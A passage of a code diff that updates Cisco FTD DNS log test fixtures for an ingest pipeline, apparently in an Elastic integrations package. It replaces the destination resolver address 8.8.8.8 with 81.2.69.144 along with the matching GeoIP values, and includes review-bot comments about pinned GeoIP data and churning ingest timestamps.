Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: 
input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: 
inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59
+2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
index fd89ffb2288..6c4c303ea09 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
@@ -13,24 +13,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 145,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -78,7 +81,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
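Review bot: The new destination.geo and destination.as values in this hunk (`"region_iso_code": "GB-OXF"`, `"city_name": "Abingdon"`, `"number": 20712`, `"name": "Andrews \u0026 Arnold Ltd"`) are presumably whatever GeoIP database the test stack ships returns for 81.2.69.144, so the expected file now pins that database's contents as well as the pipeline's own output. A refresh of that database in the test environment would fail this test with no change to the ingest pipeline, and nothing in the fixture explains why this particular address was chosen over a routable resolver. Since the expected file is strict JSON and cannot carry a comment, a short note in the package changelog entry or the test's config file along the lines of "81.2.69.144 is used because the stack's GeoIP test data resolves it deterministically; do not replace it with a real resolver address" would keep the next maintainer from reverting it. The same replacement is made in the hunks at `@@ -159,24 +162,27 @@`, `@@ -307,24 +313,27 @@`, `@@ -453,24 +462,27 @@`, `@@ -601,24 +613,27 @@` and `@@ -748,24 +763,27 @@`.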
@@ -87,8 +90,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350924300Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
+ "ingested": "2021-12-09T13:35:02.912948400Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -118,7 +121,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
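Review bot: The `event.ingested` line in this hunk changes only because the fixture was regenerated (`"ingested": "2021-09-07T12:21:56.350924300Z"` becomes `"ingested": "2021-12-09T13:35:02.912948400Z"`), so a wall-clock timestamp is being committed alongside the substantive DstIP change and will keep churning on every future regeneration. That churn makes the real diff harder to review and means the expected file can never be reproduced byte-for-byte from the input. If the test harness supports marking fields as dynamic, declaring `event.ingested` as such in this test's config would drop the timestamp from the comparison; the same churn appears in the hunks at `@@ -233,8 +239,8 @@`, `@@ -381,8 +390,8 @@`, `@@ -527,8 +539,8 @@`, `@@ -675,8 +690,8 @@` and `@@ -822,8 +840,8 @@`.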
@@ -159,24 +162,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 193,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -224,7 +230,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -233,8 +239,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350939100Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:35:02.912957800Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -265,7 +271,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -307,24 +313,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -372,7 +381,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -381,8 +390,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350943Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:35:02.912964300Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -412,7 +421,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -453,24 +462,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 200,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -518,7 +530,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -527,8 +539,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350945900Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
+ "ingested": "2021-12-09T13:35:02.912970200Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -559,7 +571,7 @@
 "dns_query": "www.elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -601,24 +613,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 193,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -666,7 +681,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -675,8 +690,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350948600Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
+ "ingested": "2021-12-09T13:35:02.912976100Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -706,7 +721,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -748,24 +763,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -813,7 +831,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -822,8 +840,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350951100Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
+ "ingested": "2021-12-09T13:35:02.912981900Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -853,7 +871,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -894,24 +912,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 199,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -959,7 +980,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -968,8 +989,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350953700Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:35:02.912987700Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1000,7 +1021,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1043,24 +1064,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 221,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1108,7 +1132,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1117,8 +1141,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350956500Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+ "ingested": "2021-12-09T13:35:02.912994100Z",
